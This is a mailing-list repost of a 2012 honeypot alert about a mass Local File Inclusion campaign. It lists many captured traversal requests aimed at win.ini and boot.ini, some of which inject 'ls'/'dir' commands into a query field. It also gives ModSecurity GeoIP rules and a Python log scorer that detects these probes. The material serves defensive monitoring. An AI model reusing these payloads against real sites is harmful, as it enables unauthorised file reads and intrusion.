[Owasp-natal] [Honeypot Alert] Large Scale LFI Attack From Brazilian Domains

Noilson Caio caiogore at gmail.com
Thursday March 22 16:23:25 UTC 2012


Worth noting: cabotelecom is on the list.

2012/3/22 Noilson Caio <caiogore at gmail.com>

> Our web sensors picked up a big uptick in Local File Inclusion (LFI)
> attacks today.  We received 3675 attacks that targeted a wide range of
> applications all attempting to use directory traversals to access:
> Windows\win.ini
> boot.ini
>  Here is a sampling of attack payloads:
> GET
> /forum/index.php?p=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00
> GET
> /forum/index.php?p=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00
> GET
> /forum/index.php?p=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00
> GET
> /sites/all/libraries/fckeditor/editor/dialog/fck_spellerpages/spellerpages/controls.html?btnUndo=Undo&misword=1&sugg=&txtsugg=../../../../../../../../../../windows/win.ini%00
> GET
> /sites/all/libraries/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=GetFolders&CurrentFolder=/&Type=../../../../../../../../../../windows/win.ini%00
> GET
> /sites/all/libraries/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=GetFoldersAndFiles&CurrentFolder=/&Type=../../../../../../../../../../windows/win.ini%00
> GET
> /wp-trackback.php?p=..........................................Windowswin.ini%00
> GET /take-quiz/index.php?album=../../../../../../../../../../boot.ini%00
> GET /take-quiz/index.php?album=../../../../../../../../../../boot.ini%00
> GET
> /forum.php?mod=viewthread&tid=..........................................Windowswin.ini%00
> GET /index.php?main_page=../../../../../../../../../../../../boot.ini%00
> GET /index.php?main_page=/boot.ini%00
> GET /index.php?main_page=../../../../../../../../../../../../boot.ini%00
> GET /index.php?main_page=/boot.ini%00
> GET
> /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
> GET
> /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
> GET
> /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
> GET
> /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
> GET
> /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
> GET
> /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
> GET
> /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
> GET
> /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
> GET
> /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
> GET
> /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
> GET
> /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
> GET
> /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
> GET
> /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
> GET
> /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
> GET
> /index.php?main_page=site_map&zenid=../../../../../../../../../../../../boot.ini%00
> GET /index.php?main_page=site_map&zenid=/boot.ini%00
>
> GET
> /index.php?main_page=featured_products&zenid=../../../../../../../../../../../../boot.ini%00
>
> GET /index.php?main_page=featured_products&zenid=/boot.ini%00
>
> GET
> /index.php?main_page=product_info&products_id=638&zenid=../../../../../../../../../../../../boot.ini%00
>
> GET /index.php?main_page=product_info&products_id=638&zenid=/boot.ini%00
>
> GET
> /index.php?main_page=page&id=1&chapter=0&zenid=../../../../../../../../../../../../boot.ini%00
>
> GET /index.php?main_page=page&id=1&chapter=0&zenid=/boot.ini%00
>
> GET
> /index.php?main_page=shippinginfo&zenid=../../../../../../../../../../../../boot.ini%00
>
> GET /index.php?main_page=shippinginfo&zenid=/boot.ini%00
>
> GET
> /index.php?main_page=privacy&zenid=../../../../../../../../../../../../boot.ini%00
>
> GET /index.php?main_page=privacy&zenid=/boot.ini%00
>
> GET
> /index.php?main_page=conditions&zenid=../../../../../../../../../../../../boot.ini%00
>
> GET /index.php?main_page=conditions&zenid=/boot.ini%00
>
> GET
> /wp-content/plugins/download-monitor/download.php?id=..........................................Windowswin.ini%00
>
> GET
> /forums/viewtopic.php?f=11&t=18551&p=444445&hilit=..........................................Windowswin.ini%00
>
> GET
> /index.php?main_page=contact_us&zenid=../../../../../../../../../../../../boot.ini%00
>
> GET /index.php?main_page=contact_us&zenid=/boot.ini%00
>
> GET
> /index.php?main_page=site_map&zenid=../../../../../../../../../../../../boot.ini%00
>
> GET /index.php?main_page=site_map&zenid=/boot.ini%00
>
> GET
> /index.php?main_page=gv_faq&zenid=../../../../../../../../../../../../boot.ini%00
>
> GET /index.php?main_page=gv_faq&zenid=/boot.ini%00
>
> GET
> /index.php?main_page=discount_coupon&zenid=../../../../../../../../../../../../boot.ini%00
>
> GET /index.php?main_page=discount_coupon&zenid=/boot.ini%00
>
> GET
> /index.php?main_page=unsubscribe&zenid=../../../../../../../../../../../../boot.ini%00
>
> GET /index.php?main_page=unsubscribe&zenid=/boot.ini%00
>
> GET
> /index.php?main_page=reviews&zenid=../../../../../../../../../../../../boot.ini%00
>
> GET /index.php?main_page=reviews&zenid=/boot.ini%00
>
> GET
> /index.php?main_page=product_reviews_info&products_id=638&reviews_id=25&zenid=../../../../../../../../../../../../boot.ini%00
>
> GET
> /index.php?main_page=product_reviews_info&products_id=638&reviews_id=25&zenid=/boot.ini%00
>
> GET
> /index.php?main_page=specials&zenid=../../../../../../../../../../../../boot.ini%00
>
> GET /index.php?main_page=specials&zenid=/boot.ini%00
>
> GET
> /index.php?main_page=advanced_search_result&search_in_description=1&zenid=p3hpsf70l0q8pg8sar4t8snr46&keyword=../../../../../../../../../../../../boot.ini%00
>
> GET
> /index.php?main_page=advanced_search_result&search_in_description=1&zenid=p3hpsf70l0q8pg8sar4t8snr46&keyword=/boot.ini%00
>
> GET
> /index.php?main_page=index&manufacturers_id=303&zenid=../../../../../../../../../../../../boot.ini%00
>
> GET /index.php?main_page=index&manufacturers_id=303&zenid=/boot.ini%00
>
> GET
> /index.php?main_page=login&zenid=../../../../../../../../../../../../boot.ini%00
>
> GET /index.php?main_page=login&zenid=/boot.ini%00
>
> GET
> /index.php?main_page=index&cPath=332&zenid=../../../../../../../../../../../../boot.ini%00
>
> GET /index.php?main_page=index&cPath=332&zenid=/boot.ini%00
>
> GET
> /index.php?main_page=featured_products&zenid=../../../../../../../../../../../../boot.ini%00
>
> GET /index.php?main_page=featured_products&zenid=/boot.ini%00
>
> GET
> /index.php?showtopic=..........................................Windowswin.ini%00
>
> GET
> /index.php?main_page=product_info&products_id=49354&zenid=../../../../../../../../../../../../boot.ini%00
>
> GET /index.php?main_page=product_info&products_id=49354&zenid=/boot.ini%00
>
>
> We identified this attack through two methods of our commercial rules feed:
> LFI virtual patching rules
> A big increase in unique malicious IP addresses (for our IP Reputation
> Feed).  We normally have between 500-800 IP addresses in our list per-day.
> Today's IP Reputation Blacklist jumped up to 2339.
> After analyzing the source IP addresses, it was clear that this LFI attack
> campaign was orchestrated by attacker(s) in Brazil.  Here is a listing of
> the Brazilian domains we identified:
>  Assigning Risk Scores
> If you are using ModSecurity to protect your web applications, and your
> user-base does not normally originate in Brazil, you may want to consider
> implementing some GeoIP rules to help raise the potential Threat Score.
> SecGeoLookupDb /path/to/apache/conf/base_rules/GeoLiteCity.dat
>
> SecRule REMOTE_ADDR "@geoLookup" "phase:1,t:none,nolog,pass"
>
> SecRule GEO:COUNTRY_CODE "@pm BR" "phase:1,t:none,log,pass,msg:'High Risk Source Location',setvar:tx.threat_score=+10"
> This would raise the Threat Score for this transaction.  You could,
> however, even block based solely on this information if you were sure that
> you have no legitimate clients from this geographic location.  Simply
> change the "pass" action to "block".
>
> --
> "I want to know how to rename a file," he says.
> Please, it's payday, isn't it?! But I'm in a good mood.
> "Sure. Just run 'rm' and the file name."
> "Thanks."
>
> Noilson Caio T. de Araújo
> Linux Professional Institute Certification
> LPI000182893
> Novell Certified Linux Administrator (CLA)
> 10111916
> Novell Data Center Technical Specialist
> http://ncaio.ithub.com.br
> http://www.commandlinefu.com/commands/by/ncaio
> http://www.dicas-l.com.br/autores/noilsoncaioteixeiradearaujo.php
>
>


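As an added example (not part of the original alert, nor ModSecurity code), the following Python pass over constructed access-log lines normalizes the encodings seen in the quoted payloads (`..%5c`, `../`, `%00`, and also double URL-encoding, which the alert does not show) and assigns an additive score in the spirit of the `tx.threat_score` rule quoted above. The IPs, timestamps, score weights and threshold are all assumptions.

```python
"""Score web-server requests for the LFI/traversal probes quoted above."""
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample lines (combined log format); IPs/timestamps are made up, query strings mirror the alert's payloads.
SAMPLE_LOG = """\
203.0.113.7 - - [22/Mar/2012:14:01:02 +0000] "GET /forum/index.php?p=..%5c..%5c..%5c..%5cwindows%5cwin.ini%00 HTTP/1.1" 200 512
203.0.113.7 - - [22/Mar/2012:14:01:03 +0000] "GET /index.php?main_page=login&zenid=../../../../../../boot.ini%00 HTTP/1.1" 200 1024
198.51.100.4 - - [22/Mar/2012:14:02:10 +0000] "GET /index.php?main_page=login&zenid=abc123 HTTP/1.1" 200 3040
203.0.113.9 - - [22/Mar/2012:14:03:11 +0000] "GET /dl.php?id=%252e%252e%252f%252e%252e%252fwindows%252fwin.ini HTTP/1.1" 404 210
203.0.113.7 - - [22/Mar/2012:14:03:40 +0000] "GET /wp-trackback.php?p=..........Windowswin.ini%00 HTTP/1.1" 200 512
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
SENSITIVE_FILES = ("win.ini", "boot.ini")  # the two targets named in the alert

def normalize(path, max_passes=3):
    """Bounded repeated URL-decoding (%5c, %2e, double encoding); backslashes become '/'."""
    decoded = path
    for _ in range(max_passes):
        step = unquote(decoded)
        if step == decoded:
            break
        decoded = step
    return decoded.replace("\\", "/").lower()

def score_request(path):
    """Additive threat score (weights are assumptions), in the spirit of the tx.threat_score rule."""
    norm = normalize(path)
    score, reasons = 0, []
    if "../" in norm:
        score, reasons = score + 5, reasons + ["traversal"]
    if any(f in norm for f in SENSITIVE_FILES):  # catches the dotted, slash-less variant too
        score, reasons = score + 4, reasons + ["sensitive-file"]
    if "\x00" in norm:  # %00 truncation attempt
        score, reasons = score + 2, reasons + ["null-byte"]
    return {"score": score, "reasons": reasons}

def analyze_log(text, threshold=5):
    """Return the parsed requests whose score reaches the threshold."""
    hits = []
    for m in filter(None, map(LOG_RE.match, text.splitlines())):
        result = score_request(m["path"])
        if result["score"] >= threshold:
            hits.append({"ip": m["ip"], "path": m["path"], **result})
    return hits

def top_sources(hits):
    """Flagged requests per source IP, the raw material for a reputation list."""
    return Counter(h["ip"] for h in hits)
```

The benign `zenid=abc123` request scores 0, while the backslash-stripped `Windowswin.ini%00` variant is still flagged through the sensitive-file and null-byte checks.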